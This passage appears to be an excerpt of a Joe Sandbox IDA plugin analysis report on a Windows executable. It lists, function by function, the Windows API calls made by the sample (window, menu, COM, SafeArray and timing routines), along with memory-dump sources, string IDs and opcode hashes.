                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 208665112-3771769585
                                                                              APIs
                                                                              • timeGetTime.WINMM ref: 00464F7A
                                                                                • Part of subcall function 0042049F: timeGetTime.WINMM(?,76C1B400,00410E7B), ref: 004204A3
                                                                              • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                                              • SetActiveWindow.USER32 ref: 0046500B
                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                                              • Sleep.KERNEL32(000000FA), ref: 00465043
                                                                              • IsWindow.USER32 ref: 0046504F
                                                                              • EndDialog.USER32(00000000), ref: 00465060
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                              • String ID: BUTTON
                                                                              • API String ID: 1194449130-3405671355
                                                                              APIs
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • CoInitialize.OLE32(00000000), ref: 0046D5EA
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                                                                              • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                                                                              • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                                                                              • _memset.LIBCMT ref: 0046D7E1
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                              • String ID:
                                                                              • API String ID: 1246142700-0
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                                              • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              APIs
                                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                                              • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                                              • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 641708696-0
                                                                              • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                              • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                                              • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                              • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                                              APIs
                                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                              • GetSysColor.USER32(0000000F), ref: 004021D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ColorLongWindow
                                                                              • String ID:
                                                                              • API String ID: 259745315-0
                                                                              • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                              • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                                                              • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                              • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                                              • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                                              • _wcscpy.LIBCMT ref: 0046A9FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                              • API String ID: 2820617543-1000479233
                                                                              • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                              • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                                              • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                              • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0048716A
                                                                              • CreateMenu.USER32 ref: 00487185
                                                                              • SetMenu.USER32(?,00000000), ref: 00487194
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                                              • IsMenu.USER32(?), ref: 00487237
                                                                              • CreatePopupMenu.USER32 ref: 00487241
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                                              • DrawMenuBar.USER32 ref: 00487276
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0$F
                                                                              • API String ID: 176399719-3044882817
                                                                              • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                              • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                                                              • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                              • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                                              • DeleteDC.GDI32(00000000), ref: 00487594
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                              • String ID: static
                                                                              • API String ID: 2559357485-2160076837
                                                                              • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                                              • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                                                              • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                                              • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00426E3E
                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                              • __gmtime64_s.LIBCMT ref: 00426ED7
                                                                              • __gmtime64_s.LIBCMT ref: 00426F0D
                                                                              • __gmtime64_s.LIBCMT ref: 00426F2A
                                                                              • __allrem.LIBCMT ref: 00426F80
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                                              • __allrem.LIBCMT ref: 00426FB3
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                                              • __allrem.LIBCMT ref: 00426FE8
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                                              • __invoke_watson.LIBCMT ref: 00427077
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                              • String ID:
                                                                              • API String ID: 384356119-0
                                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                              • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                              • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00462542
                                                                              • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                                              • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                                              • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                                              • GetMenuItemCount.USER32(?), ref: 0046262F
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                                              • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                              • String ID:
                                                                              • API String ID: 4176008265-0
                                                                              • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                              • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                                              • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                              • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                                              • _memset.LIBCMT ref: 00486FDD
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                              • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                                              • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                              • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                                              APIs
                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                                              • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                                              • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                                              • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                              • String ID:
                                                                              • API String ID: 2706829360-0
                                                                              • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                              • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                                              • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                              • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                                              APIs
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • CoInitialize.OLE32 ref: 00478403
                                                                              • CoUninitialize.OLE32 ref: 0047840E
                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                                              • IIDFromString.OLE32(?,?), ref: 004784E1
                                                                              • VariantInit.OLEAUT32(?), ref: 0047857B
                                                                              • VariantClear.OLEAUT32(?), ref: 004785DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                              • API String ID: 834269672-1287834457
                                                                              • Opcode ID: 88aa62d9e1e5a7c44cda5740427ce94969e3d026dc5a5533a65a85ed07d2a8cb
                                                                              • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
